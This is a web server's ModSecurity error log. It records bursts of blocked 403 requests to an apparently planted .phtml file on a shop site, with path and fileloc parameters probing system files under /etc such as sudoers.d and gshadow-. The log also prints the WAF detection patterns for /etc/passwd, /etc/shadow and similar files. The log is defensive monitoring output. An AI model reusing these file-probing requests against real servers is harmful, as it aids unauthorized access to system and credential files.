[Fri Mar 20 08:57:12.286747 2026] [:error] [pid 21219:tid 140411683178240] [client 57.141.18.71:58592] [client 57.141.18.71] ModSecurity: Access denied with code 403 (phase 1). Pattern match "(?:/etc/passwd|/etc/shadow|/proc/self/environ|uname -a|uname -r)" at REQUEST_LINE. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_12_KnowAttacks.conf"] [line "5"] [id "99000"] [msg "Locaweb Custom Rules - Command execution attack"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02GPXLqtnMIWvjpaKlyQAAAoc"]
[Fri Mar 20 08:57:12.634809 2026] [:error] [pid 7893:tid 140411649607424] [client 57.141.18.16:58596] [client 57.141.18.16] ModSecurity: Access denied with code 403 (phase 1). Pattern match "(?:/etc/passwd|/etc/shadow|/proc/self/environ|uname -a|uname -r)" at REQUEST_LINE. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_12_KnowAttacks.conf"] [line "5"] [id "99000"] [msg "Locaweb Custom Rules - Command execution attack"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02GBCii7xarUs8iHZydwAAAgs"]
[Fri Mar 20 08:57:13.204805 2026] [:error] [pid 26799:tid 140411557287680] [client 57.141.18.35:58612] [client 57.141.18.35] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02Gda6ubjKNq_cu4bhCAAAA1Y"]
[Fri Mar 20 08:57:13.301803 2026] [:error] [pid 7235:tid 140411632822016] [client 57.141.18.90:58618] [client 57.141.18.90] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/x11"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02GfqxLDW4GITHUkT0eAAAAQ0"]
[Fri Mar 20 08:57:13.578766 2026] [:error] [pid 9818:tid 140411716749056] [client 57.141.18.27:58620] [client 57.141.18.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02GV1pVZ5mVmJwsFM8swAAAEM"]
[Fri Mar 20 08:57:14.041428 2026] [:error] [pid 31215:tid 140411616036608] [client 57.141.18.95:58630] [client 57.141.18.95] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02GgF0L0L-SsrnPo5z8AAAAs8"]
[Fri Mar 20 08:57:14.412392 2026] [:error] [pid 10189:tid 140411582465792] [client 57.141.18.85:58640] [client 57.141.18.85] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/hosts.allow"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02GjJ3M9BSuKP7CAYp6gAAAJM"]
[Fri Mar 20 08:57:14.777402 2026] [:error] [pid 10189:tid 140411565680384] [client 57.141.18.53:58654] [client 57.141.18.53] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/cron.deny"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02GjJ3M9BSuKP7CAYp7AAAAJU"]
[Fri Mar 20 08:57:15.236582 2026] [:error] [pid 10189:tid 140411716749056] [client 57.141.18.30:58662] [client 57.141.18.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/ld.so.cache"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02GzJ3M9BSuKP7CAYp7QAAAIM"]
[Fri Mar 20 08:57:15.434322 2026] [:error] [pid 11167:tid 140411557287680] [client 57.141.18.93:58666] [client 57.141.18.93] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02G_HIg5MgXLBnicMB6wAAAdY"]
[Fri Mar 20 08:57:15.638935 2026] [:error] [pid 21219:tid 140411649607424] [client 57.141.18.33:58676] [client 57.141.18.33] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pkcs11"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02G_XLqtnMIWvjpaKlygAAAos"]
[Fri Mar 20 08:57:16.798022 2026] [:error] [pid 11642:tid 140411674785536] [client 57.141.18.25:58710] [client 57.141.18.25] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02HLninkcc-iUj5ApozQAAA4g"]
[Fri Mar 20 08:57:17.231931 2026] [:error] [pid 11642:tid 140411666392832] [client 57.141.18.9:58722] [client 57.141.18.9] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/adjtime"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02Hbninkcc-iUj5ApozwAAA4k"]
[Fri Mar 20 08:57:17.311576 2026] [:error] [pid 11642:tid 140411607643904] [client 57.141.18.38:58726] [client 57.141.18.38] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/kdump.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02Hbninkcc-iUj5Apo0AAAA5A"]
[Fri Mar 20 08:57:17.776735 2026] [:error] [pid 9818:tid 140411557287680] [client 57.141.18.12:58750] [client 57.141.18.12] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/ethertypes"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02HV1pVZ5mVmJwsFM8tgAAAFY"]
[Fri Mar 20 08:57:18.153339 2026] [:error] [pid 11642:tid 140411741927168] [client 57.141.18.118:58764] [client 57.141.18.118] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02Hrninkcc-iUj5Apo1AAAA4A"]
[Fri Mar 20 08:57:18.210465 2026] [:error] [pid 26799:tid 140411666392832] [client 57.141.18.86:58766] [client 57.141.18.86] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/inputrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02Hta6ubjKNq_cu4bhCgAAA0k"]
[Fri Mar 20 08:57:18.915890 2026] [:error] [pid 11642:tid 140411565680384] [client 57.141.18.37:58780] [client 57.141.18.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/tenable_tag"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02Hrninkcc-iUj5Apo1wAAA5U"]
[Fri Mar 20 08:57:19.031932 2026] [:error] [pid 11642:tid 140411624429312] [client 57.141.18.108:58782] [client 57.141.18.108] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/host.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02H7ninkcc-iUj5Apo2AAAA44"]
[Fri Mar 20 08:57:19.357363 2026] [:error] [pid 11642:tid 140411725141760] [client 57.141.18.43:58794] [client 57.141.18.43] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/aliases"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02H7ninkcc-iUj5Apo2gAAA4I"]
[Fri Mar 20 08:57:19.662658 2026] [:error] [pid 11642:tid 140411649607424] [client 57.141.18.67:58796] [client 57.141.18.67] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dir_colors"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02H7ninkcc-iUj5Apo2wAAA4s"]
[Fri Mar 20 08:57:20.058488 2026] [:error] [pid 11642:tid 140411607643904] [client 57.141.18.115:58804] [client 57.141.18.115] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02ILninkcc-iUj5Apo3QAAA5A"]
[Fri Mar 20 08:57:20.556085 2026] [:error] [pid 7235:tid 140411691570944] [client 57.141.18.38:58816] [client 57.141.18.38] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/redhat-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02IPqxLDW4GITHUkT0egAAAQY"]
[Fri Mar 20 08:57:20.676182 2026] [:error] [pid 31215:tid 140411741927168] [client 57.141.18.43:58818] [client 57.141.18.43] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/centos-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02IAF0L0L-SsrnPo5z8gAAAsA"]
[Fri Mar 20 08:57:21.184233 2026] [:error] [pid 15826:tid 140411599251200] [client 57.141.18.94:58834] [client 57.141.18.94] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/gshadow-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02IeoXxyEfFpUF8f-LpwAAAVE"]
[Fri Mar 20 08:57:21.379243 2026] [:error] [pid 7893:tid 140411590858496] [client 57.141.18.111:58840] [client 57.141.18.111] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02IRCii7xarUs8iHZyeQAAAhI"]
[Fri Mar 20 08:57:21.699639 2026] [:error] [pid 11642:tid 140411582465792] [client 57.141.18.77:58844] [client 57.141.18.77] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02Ibninkcc-iUj5Apo4gAAA5M"]
[Fri Mar 20 08:57:22.251564 2026] [:error] [pid 7893:tid 140411607643904] [client 57.141.18.0:58856] [client 57.141.18.0] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/inittab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02IhCii7xarUs8iHZyegAAAhA"]
[Fri Mar 20 08:57:22.411495 2026] [:error] [pid 10189:tid 140411741927168] [client 57.141.18.83:58858] [client 57.141.18.83] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc3.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02IjJ3M9BSuKP7CAYp8AAAAIA"]
